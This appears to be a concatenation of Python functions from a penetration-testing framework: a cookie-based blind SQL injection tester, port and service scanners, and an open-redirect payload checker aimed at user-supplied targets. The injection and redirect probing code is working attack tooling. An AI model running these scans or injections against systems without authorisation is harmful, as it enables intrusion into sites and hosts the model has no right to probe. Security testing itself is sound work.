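    if vsession.cookies:
        print(G + ' [+] This website supports session cookies...')
        success = []
        if not parallel:
            for i in pay:
                print(B + " [*] Trying Payload : " + C + '' + i)
                time.sleep(0.7)
                # Iterate a snapshot: a response may rewrite the jar while
                # the loop is running.
                for cookie in list(vsession.cookies):
                    # Restore the value after each request. Previously every
                    # payload stayed appended, so later probes carried all
                    # earlier payloads and hits were credited to the wrong one.
                    clean_value = cookie.value
                    tainted_value = clean_value + i
                    cookie.value = tainted_value
                    print(O + ' [+] Using ' + R + '!nfected' + O +
                          ' cookie : ' + GR + tainted_value)
                    try:
                        r = vsession.get(web)
                    finally:
                        cookie.value = clean_value
                    if len(r.content) != len(req.content):
                        poc = (C + " [+] PoC : " + O + cookie.name + " : " +
                               GR + tainted_value)
                        print(G + " [+] Blind Based SQli (Cookie Based) Detected! ")
                        print(poc)
                        print(P + ' [+] Code : ' + W + str(r.text) + '\n')
                        success.append(i)
        else:
            paylists = listsplit(pay, round(len(pay) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(cookiepre, args=(vsession, web, chunk, req,))
                    for chunk in paylists
                ]
                for pending in res:
                    success += pending.get()
        if success:
            data = ("SQLi Vulnerability (Cookie) found!\nSuccessful payloads: "
                    + str(success))
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(" [+] SQLi Vulnerability (Cookie) found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "(cookie) no payload succeeded.")
    else:
        print(R + ' [-] No support for cookies...')
        time.sleep(0.5)
        print(R + ' [-] Cookie based injection not possible...')
        data = "No support for cookies. Cookie based injection not possible."
        save_data(database, module, lvl1, lvl2, lvl3, name, data)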
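def service0x00(host):
    """Scan a port range on ``host`` and print a port/state/service table.

    The range and the verbose flag come from ``properties`` (a value of
    ``" "`` means "ask on the console"). The range is split across
    ``processes`` workers running ``portloop``; each open port is looked up
    with ``get_servicev`` and the result is stored with ``save_data``.

    Args:
        host: Host name or address to scan; it must resolve or the function
            exits.
    """
    from core.methods.print import pscan
    pscan("service detection")
    if properties["INIT"][1] == " ":
        start_port = input(C + ' [§] Enter initial port :> ')
    else:
        start_port = properties["INIT"][1]
    if properties["FIN"][1] == " ":
        end_port = input(C + ' [§] Enter ending port :> ')
    else:
        end_port = properties["FIN"][1]
    start_port = int(start_port)
    end_port = int(end_port)
    open_ports = []
    closed_ports = []

    # Name resolution doubles as the reachability test; the address itself
    # is not used afterwards.
    try:
        socket.gethostbyname(host)
        print(G + '\n [+] Target server detected up and running...' + C + color.TR2 + C)
        print(O + ' [*] Preparing for scan...' + C)
    except Exception:
        print(R + ' [-] Server not responding...')
        time.sleep(0.3)
        print(R + ' [*] Exiting...')
        quit()

    if properties["VERBOSE"][1] == " ":
        mn = input(C + '\n [?] Do you want a verbose output (enter if not) :> ')
        verbose = mn != ""
    else:
        verbose = properties["VERBOSE"][1] == "1"
    if verbose:
        print('' + P + '\n [+] Verbose mode selected !\n')
    print(GR + " [!] Scanning %s from port %s - %s: " % (host, start_port, end_port))
    print(G + " [*] Scanning started at %s" % (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
    starting_time = time.time()

    try:
        if verbose:
            print(O + " [*] Scan in progress.." + C)
            time.sleep(0.8)
        portrange = range(start_port, end_port + 1)
        prtlst = listsplit(portrange, round(len(portrange) / processes))
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(portloop, args=(chunk, host, verbose,))
                for chunk in prtlst
            ]
            for pending in res:
                found = pending.get()
                open_ports += found[0]
                closed_ports += found[1]
        print(G + "\n [+] Scanning completed at %s" % (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
        total_time = time.time() - starting_time
        print(P + ' [*] Preparing report...\n' + C)
        time.sleep(1)
        openports = " {}{}{}{}{}{}{}{} ports open.".format(
            color.TR5, C, G, str(len(open_ports)), color.END, color.TR2,
            color.END, color.CURSIVE)
        summary("servicedetect", openports)
        print()

        # Cells are padded to the border widths, so one row format replaces
        # the five per-length branches and the columns line up for any port.
        border = P + ' +--------+----------+-----------+'
        print(border)
        print(P + ' | ' + C + 'PORT'.ljust(7) + P + '| ' + C + 'STATE'.ljust(9) +
              P + '| ' + C + 'SERVICE'.ljust(10) + P + '|')
        print(border)
        if open_ports:
            data = "Port:Service >>\n"
            for i in sorted(open_ports):
                service = get_servicev(i)
                if not service:
                    service = "Unknown"
                m = str(service)
                c = str(i)
                data = data + "\n" + c + ":" + m
                # The service cell is left open-ended: names vary in length.
                print(P + ' | ' + C + c.ljust(7) + P + '| ' + C +
                      'OPEN'.ljust(9) + P + '| ' + C + m)
                print(border)
                time.sleep(0.2)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
        else:
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No open ports found.")
            print(R + "\n [-] No open ports found.!!\n")
        print(B + '\n [!] ' + str(len(closed_ports)) + ' closed ports not shown')
        print(G + " [+] Host %s scanned in %s seconds" % (host, total_time) + C + color.TR2 + C + "\n")
    except KeyboardInterrupt:
        print(R + "\n [-] User requested shutdown... ")
        print(' [-] Exiting...\n')
        quit()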
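def scan0x00(target):
    """Run the TCP connect scan over a port range on ``target``.

    The range and the verbose flag come from ``properties`` (a value of
    ``" "`` means "ask on the console"). After ``checkhost`` the range is
    split across ``processes`` workers running ``portloop`` and the open
    ports are printed as a table. This variant does not call ``save_data``.

    Args:
        target: Host name or address; resolved once and scanned by address.
    """
    try:
        from core.methods.print import pscan
        pscan("tcp connect scan")
        if properties["INIT"][1] == " ":
            min_port = input(C + ' [§] Enter initial port :> ')
        else:
            min_port = properties["INIT"][1]
        if properties["FIN"][1] == " ":
            max_port = input(C + ' [§] Enter ending port :> ')
        else:
            max_port = properties["FIN"][1]
        open_ports = []
        closed_ports = []
        ip_host = socket.gethostbyname(target)
        if properties["VERBOSE"][1] == " ":
            chk = input(
                C + ' [?] Do you want a verbose output? (enter if not) :> ')
            # Value comparison; `is not ""` tested object identity.
            verbose = chk != ""
        else:
            verbose = properties["VERBOSE"][1] == "1"

        print(GR + ' [*] Checking port range...')
        # Non-numeric input raises here and is reported by the handler below.
        first_port = int(min_port)
        last_port = int(max_port)
        # 65535 is the highest TCP port; the old bound let 65536 through.
        if not 0 <= first_port <= last_port <= 65535:
            print(R + "\n [!] Invalid Range of Ports")
            print(" [!] Exiting...")
            quit()

        print(P + ' [!] Port range detected valid...' + C)
        time.sleep(0.3)
        print(GR + ' [*] Preparing for the scan...')
        ports = range(first_port, last_port + 1)
        prtlst = listsplit(ports, round(len(ports) / processes))
        starting_time = time.time()
        checkhost(ip_host)
        print(G + " [!] Scanning initiated at " + strftime("%H:%M:%S") + "!" +
              C + color.TR2 + C + "\n")
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(portloop, args=(chunk, verbose, ip_host,))
                for chunk in prtlst
            ]
            for pending in res:
                found = pending.get()
                open_ports += found[0]
                closed_ports += found[1]
        print(G + "\n [!] Scanning completed at %s" % (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
        total_time = time.time() - starting_time
        print(P + ' [*] Preparing report...\n' + C)
        time.sleep(1)
        openports = " {}{}{}{}{}{}{}{} ports open.".format(
            color.TR5, C, G, str(len(open_ports)), color.END, color.TR2,
            color.END, color.CURSIVE)
        summary("tcp connect", openports)
        print()

        # Cells are padded to the border widths, so one row format replaces
        # the five per-length branches and the columns line up for any port.
        border = P + ' +--------+------------------+'
        print(border)
        print(P + ' | ' + GR + 'PORT'.ljust(7) + P + '| ' + C +
              'STATE'.ljust(17) + P + '|')
        print(border)
        if open_ports:
            for i in sorted(open_ports):
                c = str(i)
                print(P + ' | ' + C + c.ljust(7) + P + '| ' + C +
                      'OPEN'.ljust(17) + P + '|')
                print(border)
                time.sleep(0.2)
            print('')
        else:
            print(R + ' [-] No open ports found!')
        print(B + ' [!] ' + str(len(closed_ports)) + ' closed ports not shown')
        print(G + " [+] Host %s scanned in %s seconds" % (target, total_time) + C + color.TR2 + C + "\n")
    except Exception as e:
        # Covers resolution failures and non-numeric port input.
        print(e)
        quit()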
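def scan0x00(target):
    """Run the TCP stealth scan over a port range on ``target``.

    The range and the verbose flag come from ``properties`` (a value of
    ``" "`` means "ask on the console"). After ``checkhost`` the range is
    split across ``processes`` workers running ``portloop``; the open ports
    are printed as a table and stored with ``save_data``.

    Args:
        target: Host name or address; resolved once, workers get the address.
    """
    try:
        from core.methods.print import pscan
        pscan("tcp stealth scan")
        if properties["INIT"][1] == " ":
            min_port = input(C + ' [§] Enter initial port :> ')
        else:
            min_port = properties["INIT"][1]
        if properties["FIN"][1] == " ":
            max_port = input(C + ' [§] Enter ending port :> ')
        else:
            max_port = properties["FIN"][1]
        open_ports = []
        closed_ports = []
        ip_host = socket.gethostbyname(target)
        if properties["VERBOSE"][1] == " ":
            chk = input(
                C + ' [?] Do you want a verbose output? (enter if not) :> ')
            verbose = chk != ""
        else:
            verbose = properties["VERBOSE"][1] == "1"

        print(GR + ' [*] Checking port range...')
        try:
            first_port = int(min_port)
            last_port = int(max_port)
        except (TypeError, ValueError):
            print(R + "\n [!] Invalid Range of Ports")
            print(" [!] Exiting...")
            quit()
        # 65535 is the highest TCP port; the old bound let 65536 through.
        if not 0 <= first_port <= last_port <= 65535:
            print(R + "\n [!] Invalid Range of Ports")
            print(" [!] Exiting...")
            quit()
        print(P + ' [!] Port range detected valid...' + C)
        time.sleep(0.3)
        print(GR + ' [*] Preparing for the scan...')

        ports = range(first_port, last_port + 1)
        prtlst = listsplit(ports, round(len(ports) / processes))
        starting_time = time.time()
        checkhost(target)
        print(G + " [!] Scanning initiated at " + strftime("%H:%M:%S") + "!" +
              C + color.TR2 + C + "\n")
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(portloop, args=(chunk, verbose, ip_host,))
                for chunk in prtlst
            ]
            for pending in res:
                found = pending.get()
                open_ports += found[0]
                closed_ports += found[1]
        print(G + "\n [!] Scanning completed at %s" % (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
        total_time = time.time() - starting_time
        print(P + ' [*] Preparing report...\n' + C)
        time.sleep(1)
        openports = " {}{}{}{}{}{}{}{} ports open.".format(
            color.TR5, C, G, str(len(open_ports)), color.END, color.TR2,
            color.END, color.CURSIVE)
        summary("tcp stealth", openports)
        print()

        # Cells are padded to the border widths, so one row format replaces
        # the five per-length branches and the columns line up for any port.
        border = P + ' +--------+------------------+'
        print(border)
        print(P + ' | ' + GR + 'PORT'.ljust(7) + P + '| ' + C +
              'STATE'.ljust(17) + P + '|')
        print(border)
        if open_ports:
            for i in sorted(open_ports):
                c = str(i)
                print(P + ' | ' + C + c.ljust(7) + P + '| ' + C +
                      'OPEN'.ljust(17) + P + '|')
                print(border)
                time.sleep(0.2)
            print('')
            data = "Open Ports: " + str(open_ports)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
        else:
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No open ports found.")
            print('' + R + " [-] Sorry, No open ports found.!!")
        print(C + '\n [!] ' + str(len(closed_ports)) + ' closed ports not shown')
        print(G + " [+] Host %s scanned in %s seconds" % (target, total_time) + C + color.TR2 + C + "\n")
    except KeyboardInterrupt:
        print(R + "\n [-] User Requested Shutdown...")
        print(" [*] Exiting...")
        quit()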
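def openredirect(web):
    """Drive the open-redirect check for one parameterised path on ``web``.

    The scope path, parallel flag, payload file and optional cookie are asked
    for on the console. The assembled URL, header set and the module-level
    ``payloads`` list are handed to ``check0x00`` (serially or through a
    process pool) and the successful payloads are printed.

    Args:
        web: Base URL of the target; the scope path is appended to it.
    """
    print(GR + ' [*] Loading module...')
    time.sleep(0.6)
    from core.methods.print import pvln
    pvln("open redirect checker")
    default_list = 'files/payload-db/openredirect_payloads.lst'
    try:
        param = input(
            O + ' [#] Scope parameter to test (eg. /redirect.php?site=foo) :> ')
        if '?' not in param or '=' not in param:
            print(R + ' [-] Your input does not match a parameter...')
            param = input(O + ' [#] Enter paramter to test :> ')

        # The URL is now built on every path. Previously a re-entered
        # parameter or an unrecognised answer left web00 unassigned and the
        # module failed later with an unbound-variable error.
        if param.startswith('/'):
            m = input(
                GR + '\n [!] Your path starts with "/".\n [#] Do you mean root directory? (Y/n) :> ')
            if m.lower() not in ('y', 'n'):
                print(R + ' [-] U mad?')
                return
            web00 = web + param
        else:
            web00 = web + '/' + param

        pa = input(" [?] Parallel Attack? (enter if not) :> ")
        # Value comparison; `is not ""` tested object identity.
        parallel = pa != ""

        print(GR + ' [*] Configuring relative headers...')
        time.sleep(0.8)
        gen_headers = {
            'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
            'Accept-Language': 'en-US;',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'text/html,application/xhtml+xml,application/xml;',
            'Connection': 'close'
        }

        print(O + ' [!] Enter path to payload file ' + R +
              '(Default: files/payload-db/openredirect_payloads.lst)')
        fi = input(O + ' [#] Your input (Press Enter if default) :> ')
        # Fall back to the bundled list when nothing usable was supplied.
        if fi == '':
            fi = default_list
        elif os.path.exists(fi):
            print(G + ' [+] File found under ' + fi)
        else:
            print(R + ' [-] File not found... Using default payload...')
            fi = default_list
        getPayloads0x00(fi)

        input_cookie = input("\n [#] Got any cookies? [just enter if none] :> ")
        if input_cookie:
            gen_headers['Cookie'] = input_cookie

        print(GR + ' [*] Configuring payloads with Url...')
        success = []
        if not parallel:
            # Keep the serial result too. It used to be discarded, so a
            # serial run always reported that no payload succeeded.
            success += check0x00(web00, gen_headers, payloads)
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(check0x00, args=(web00, gen_headers, chunk,))
                    for chunk in paylists
                ]
                for pending in res:
                    success += pending.get()

        if success:
            print(" [+] Open Redirect Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
    except KeyboardInterrupt:
        print(R + ' [-] User Interruption Detected!')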